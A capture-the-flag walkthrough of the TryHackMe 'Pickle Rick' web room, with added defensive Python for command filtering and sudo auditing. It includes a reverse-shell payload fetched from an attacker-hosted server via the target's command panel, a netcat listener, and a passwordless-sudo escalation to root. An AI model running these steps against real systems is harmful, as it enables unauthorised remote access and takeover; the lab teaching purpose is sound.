A Rick and Morty CTF. Help turn Rick back into a human!
Description: This Rick and Morty themed challenge requires you to exploit a web server to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.
Tags: ctf, dirbuster, linux
TryHackMe Difficulty: Easy
Link: https://tryhackme.com/room/picklerick
Pickle Rick is number 1 of 10 on the ‘Starters’ TryHackMe room series. It appears to be loosely based around a popular ‘Rick and Morty’ episode of the same name.
The goal for this box is to find 3 ingredients (keys/flags). Let’s get started.
Nmap:
┌─[loki@parrot]─[~/OpenVPN]
└──╼ $nmap -A -p- 10.10.92.9
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-20 23:27 EST
Nmap scan report for 10.10.92.9
Host is up (0.081s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1f:4c:ac:ee:0f:f2:20:61:13:37:59:13:ca:8c:ce:97 (RSA)
| 256 be:db:ff:b7:42:08:50:36:dc:09:3d:d1:69:16:61:36 (ECDSA)
|_ 256 24:5e:37:e7:1a:3e:10:ec:0d:2e:8b:c7:7b:ba:9c:0d (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.13 seconds
One open SSH port and one open web server. We'll take a peek at the web server to see what's there.
Help Morty!
Listen Morty… I need your help, I’ve turned myself into a pickle again and this time I can’t change back!
I need you to *BURRRP*….Morty, logon to my computer and find the last three secret ingredients to finish my pickle-reverse potion. The only problem is, I have no idea what the *BURRRRRRRRP*, password was! Help Morty, Help!
Looks like we're on the hunt for a username and password. With the room's tags mentioning "dirbuster", we'll start running dirb in the background while doing some manual enumeration of the site. Since there are no additional links on the page, we'll look at two items, the page source and robots.txt, both classic CTF hotspots for information.
Source:
<!--
Note to self, remember username!
Username: R1ck*****
-->
Appears we’ve located a username in the source. What about robots.txt?
Wubba********dub
Could this be our username and password combination? Possibly. But where can we utilize these credentials? Let’s see if dirb found any results.
┌─[✗]─[loki@parrot]─[~]
└──╼ $dirb http://10.10.44.196 -X .html,.php /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Nov 24 09:11:42 2020
URL_BASE: http://10.10.44.196/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.html,.php) | (.html)(.php) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.44.196/ ----
+ http://10.10.44.196/denied.php (CODE:302|SIZE:0)
+ http://10.10.44.196/index.html (CODE:200|SIZE:1062)
+ http://10.10.44.196/login.php (CODE:200|SIZE:882)
+ http://10.10.44.196/portal.php (CODE:302|SIZE:0)
-----------------
END_TIME: Tue Nov 24 09:25:24 2020
DOWNLOADED: 9224 - FOUND: 4
Logging in at /login.php takes us to /portal.php, where we're met with a 'Command Panel'. Checking the other four tabs, we are advised that "Only the REAL rick can view this page." What can we do with the command panel? Let's try some basic shell commands.
pwd
/var/www/html
ls -lah
total 40K
drwxr-xr-x 3 root root 4.0K Feb 10 2019 .
drwxr-xr-x 3 root root 4.0K Feb 10 2019 ..
-rwxr-xr-x 1 ubuntu ubuntu 17 Feb 10 2019 Sup3rS3cretPickl3Ingred.txt
drwxrwxr-x 2 ubuntu ubuntu 4.0K Feb 10 2019 assets
-rwxr-xr-x 1 ubuntu ubuntu 54 Feb 10 2019 clue.txt
-rwxr-xr-x 1 ubuntu ubuntu 1.1K Feb 10 2019 denied.php
-rwxrwxrwx 1 ubuntu ubuntu 1.1K Feb 10 2019 index.html
-rwxr-xr-x 1 ubuntu ubuntu 1.5K Feb 10 2019 login.php
-rwxr-xr-x 1 ubuntu ubuntu 2.0K Feb 10 2019 portal.php
-rwxr-xr-x 1 ubuntu ubuntu 17 Feb 10 2019 robots.txt
whoami
www-data
So we’re user ‘www-data’ within the ‘/var/www/html’ directory and we’ve got some files to check out.
cat clue.txt
Command disabled to make it hard for future PICKLEEEE RICCCKKKK.
Alright, what about clue.txt and Sup3rS3cretPickl3Ingred.txt from the browser?
/clue.txt
Look around the file system for the other ingredient.
/Sup3rS3cretPickl3Ingred.txt
mr. ******* hair
1/3 found. Let’s see what else we can find. What about users home directories?
ls -lah /home
total 16K
drwxr-xr-x 4 root root 4.0K Feb 10 2019 .
drwxr-xr-x 23 root root 4.0K Nov 24 13:44 ..
drwxrwxrwx 2 root root 4.0K Feb 10 2019 rick
drwxr-xr-x 4 ubuntu ubuntu 4.0K Feb 10 2019 ubuntu
ls -lah /home/rick
total 12K
drwxrwxrwx 2 root root 4.0K Feb 10 2019 .
drwxr-xr-x 4 root root 4.0K Feb 10 2019 ..
-rwxrwxrwx 1 root root 13 Feb 10 2019 second ingredients
We can’t cat the file, as the command is disabled. Can we tac it?
tac /home/rick/'second ingredients'
1 ***** tear
2/3. It seems ‘tac’ was the intended method for this one.
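The command panel blocks cat by name, and tac walked straight past that check. As an added illustration (not code from the room or this write-up), the Python below reconstructs a deny-list check of that shape beside an allow-list check that tokenises the command, rejects shell metacharacters, and confines path arguments to the web root; the banned words, the allowed commands and the WEB_ROOT value are assumptions.

```python
import os
import shlex

WEB_ROOT = "/var/www/html"  # assumed panel working directory, matching the write-up's pwd


def denylist_filter(cmd):
    """Deny-list check of the shape the panel appears to use (reconstructed,
    not the room's code): refuse banned words, otherwise pass the raw string
    on to a shell. Any synonym of a banned command walks straight through."""
    banned = {"cat", "head", "more", "less"}  # assumed list
    if any(word in banned for word in cmd.split()):
        return False, "Command disabled"
    return True, cmd  # the whole string would reach the shell unchanged


SHELL_META = set(";|&$`<>(){}*?\n")
ALLOWED = {"pwd": 0, "whoami": 0, "uptime": 0, "ls": 1}  # command -> max args (assumed)


def allowlist_filter(cmd):
    """Allow-list check: only known commands, tokenised into argv (never a
    shell string), no metacharacters, and every path argument must resolve
    inside WEB_ROOT. Returns (ok, argv) on success or (False, reason)."""
    if SHELL_META & set(cmd):
        return False, "shell metacharacter rejected"
    try:
        argv = shlex.split(cmd)
    except ValueError as exc:
        return False, f"bad quoting: {exc}"
    if not argv or argv[0] not in ALLOWED:
        return False, "command not on allow-list"
    if len(argv) - 1 > ALLOWED[argv[0]]:
        return False, "too many arguments"
    for arg in argv[1:]:
        if arg.startswith("-"):
            continue  # option flag, not a path
        resolved = os.path.normpath(os.path.join(WEB_ROOT, arg))
        if resolved != WEB_ROOT and not resolved.startswith(WEB_ROOT + os.sep):
            return False, "path escapes web root"
    return True, argv  # safe to hand to subprocess.run(argv, shell=False)
```

The allow-list version rejects the tac command and absolute or ../ paths outright, which is the difference between "disable a word" and "permit only what the panel is meant to do".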
For the 3rd ingredient we'll most likely need a proper shell to escalate privileges. We'll grab a PHP reverse shell script and pull it onto the web server.
┌─[loki@parrot]─[~/Downloads]
└──╼ $wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
--2020-11-21 01:43:58--  https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Resolving raw.githubusercontent.com (raw.githubusercontent.com)… 151.101.208.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.208.133|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 5491 (5.4K) [text/plain]
Saving to: 'php-reverse-shell.php'

php-reverse-shell.php 100%[=====================================================================================================>] 5.36K --.-KB/s in 0s

2020-11-21 01:43:58 (23.0 MB/s) - 'php-reverse-shell.php' saved [5491/5491]
┌─[loki@parrot]─[~/Downloads]
└──╼ $cp php-reverse-shell.php /home/loki/denied.php
┌─[loki@parrot]─[~/Downloads]
└──╼ $cd ..
We'll edit the script, then spin up a Python web server to host it.
┌─[loki@parrot]─[~]
└──╼ $sudo nano denied.php
[sudo] password for loki:
┌─[loki@parrot]─[~]
└──╼ $python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) …
If we run 'sudo wget http://10.6.22.82:8888/denied.php' in the web portal's command panel, this should pull down our file.
10.10.92.9 - - [21/Nov/2020 01:46:46] "GET /denied.php HTTP/1.1" 200 -
We can then rename the downloaded file (wget saved it as denied.php.1 because denied.php already existed) so that it overwrites the original, and navigate to a tab that loads denied.php.
mv denied.php.1 denied.php
Host:
┌─[✗]─[loki@parrot]─[~/OpenVPN]
└──╼ $nc -lvnp 4444
listening on [any] 4444 …
connect to [10.6.22.82] from (UNKNOWN) [10.10.92.9] 48464
Linux ip-10-10-92-9 4.4.0-1072-aws #82-Ubuntu SMP Fri Nov 2 15:00:21 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
07:10:49 up 2:44, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
Awesome. We’re in. What can we do?
$ sudo -l
Matching Defaults entries for www-data on ip-10-10-92-9.eu-west-1.compute.internal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ip-10-10-92-9.eu-west-1.compute.internal:
(ALL) NOPASSWD: ALL
Maybe…
$ sudo su -
mesg: ttyname failed: Inappropriate ioctl for device
whoami
root
Let’s get our 3rd ingredient.
cd /root
ls -lah
total 28K
drwx------ 4 root root 4.0K Feb 10 2019 .
drwxr-xr-x 23 root root 4.0K Nov 21 04:26 ..
-rw-r--r-- 1 root root 29 Feb 10 2019 3rd.txt
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwxr-xr-x 3 root root 4.0K Feb 10 2019 snap
drwx------ 2 root root 4.0K Feb 10 2019 .ssh
cat 3rd.txt
3rd ingredients: ***** juice
Awesome. We’re finished.
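The sudo -l output above is what handed over root: the web server account can run anything, as anyone, with no password. As an added example (not from the write-up), the Python below parses output of that shape and flags such rules; the sample text is constructed to match the output shown, with a second, narrower rule added for contrast, and the service-account list is an assumption.

```python
import re

# Constructed sample in the shape of the `sudo -l` output in the write-up,
# with a second, narrower rule added for contrast.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on ip-10-10-92-9.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin
User www-data may run the following commands on ip-10-10-92-9.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
    (root) /usr/sbin/service apache2 restart
"""
# One rule line: "(runas) [TAG: ...] command[, command]", e.g. "(ALL) NOPASSWD: ALL"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*"
    r"(?P<tags>(?:(?:NO)?(?:PASSWD|SETENV|EXEC):\s*)*)"
    r"(?P<cmds>.+?)\s*$"
)
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}  # assumed list

def parse_sudo_l(text):
    """Parse `sudo -l` output into rule dicts; the Defaults section is skipped."""
    rules, user = [], None
    for line in text.splitlines():
        head = re.match(r"^User (\S+) may run the following commands", line)
        if head:
            user = head.group(1)
            continue
        rule = RULE_RE.match(line) if user else None
        if rule:
            rules.append({
                "user": user,
                "runas": rule.group("runas").strip(),
                "nopasswd": "NOPASSWD:" in rule.group("tags").upper(),
                "commands": [c.strip() for c in rule.group("cmds").split(",")],
            })
    return rules

def audit(rules):
    """Return (severity, message) findings; unrestricted rules rank highest."""
    findings = []
    for r in rules:
        if "ALL" in r["commands"]:
            sev = "CRITICAL" if r["nopasswd"] else "HIGH"
            findings.append((sev, f"{r['user']} may run ALL as ({r['runas']})"
                             + (" without a password" if r["nopasswd"] else "")))
        elif r["nopasswd"] and r["user"] in SERVICE_ACCOUNTS:
            findings.append(("MEDIUM", f"service account {r['user']} has passwordless "
                             f"sudo for {', '.join(r['commands'])}"))
    return findings
```

Run over the sample, only the (ALL) NOPASSWD: ALL line is reported, as CRITICAL; the service-restart rule is scoped and password-protected and produces no finding.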
Overall, this was a good beginner machine utilizing some CTF basics. I look forward to continuing with the 10 room path and seeing where things go.
